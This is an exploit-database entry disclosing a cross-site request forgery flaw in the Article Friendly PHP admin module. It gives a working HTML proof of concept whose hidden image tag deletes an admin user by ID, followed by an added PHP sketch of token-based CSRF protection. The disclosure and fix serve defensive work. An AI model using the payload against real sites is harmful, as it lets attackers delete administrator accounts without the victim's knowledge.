0day Today Exploits Market and 0day Exploits Database

Article Friendly CSRF Vulnerability

Author: Pratul Agrawal
Risk: Security Risk Unsorted
0day-ID: 0day-ID-11056
Category: web applications
Date added: 24-02-2010
Platform: unsorted
===================================
Article Friendly CSRF Vulnerability
===================================

  # Vulnerability found in   Admin module

  # Company       aksitservices

  # Credit by     Pratul Agrawal

  # Site page     http://www.articlefriendly.com/

  # Platform      php

   
  # Proof of concept   #
 
  Targeted URL:  http://server/admin/index.php?filename=adminlogin
  
 
  Script to delete the admin user through cross-site request forgery:
  
  ..................................................................................................................

  <html>
    <body>
      <img src="http://server/admin/index.php?filename=adminuser&a=3&adminid=[USER ID]" />
    </body>
  </html>

  ..................................................................................................................
  
  
  
  After execution, refresh the page and you can see that the user with the given ID gets deleted automatically.
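
  A defensive sketch of how the delete action above could be guarded, added here as an example and not Article Friendly's own code. The parameter names a and adminid come from the PoC URL; the session layout, the csrf_token field name and the delete_admin_user() helper are assumptions, and the admin login check is assumed to run before this code.

```php
<?php
declare(strict_types=1);

// Added example. SameSite=Strict keeps the session cookie off cross-site requests.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict']);
session_start();

// One random token per session; the admin form embeds it as a hidden field.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only for a POST carrying the session's token. An <img> tag issues a GET
// and cannot read the token, so the request in the PoC fails both checks.
function csrf_request_is_valid(string $method, array $post, array $session): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $sent = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    return is_string($sent) && is_string($expected) && $expected !== ''
        && hash_equals($expected, $sent);
}

// Hypothetical stand-in for the application's real delete routine.
function delete_admin_user(int $id): void
{
    error_log("admin user $id deleted");
}

// Dispatch for the action seen in the PoC URL (a=3 with adminid).
if (($_REQUEST['a'] ?? '') === '3') {
    if (!csrf_request_is_valid($_SERVER['REQUEST_METHOD'] ?? '', $_POST, $_SESSION)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token.');
    }
    $id = filter_var($_POST['adminid'] ?? null, FILTER_VALIDATE_INT);
    if ($id === false) {
        http_response_code(400);
        exit('Invalid adminid.');
    }
    delete_admin_user($id);
}
```

  The form that submits the delete would include the value of csrf_token() in a hidden field named csrf_token.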
 
 
#If you have any questions, comments, or concerns, feel free to contact me.


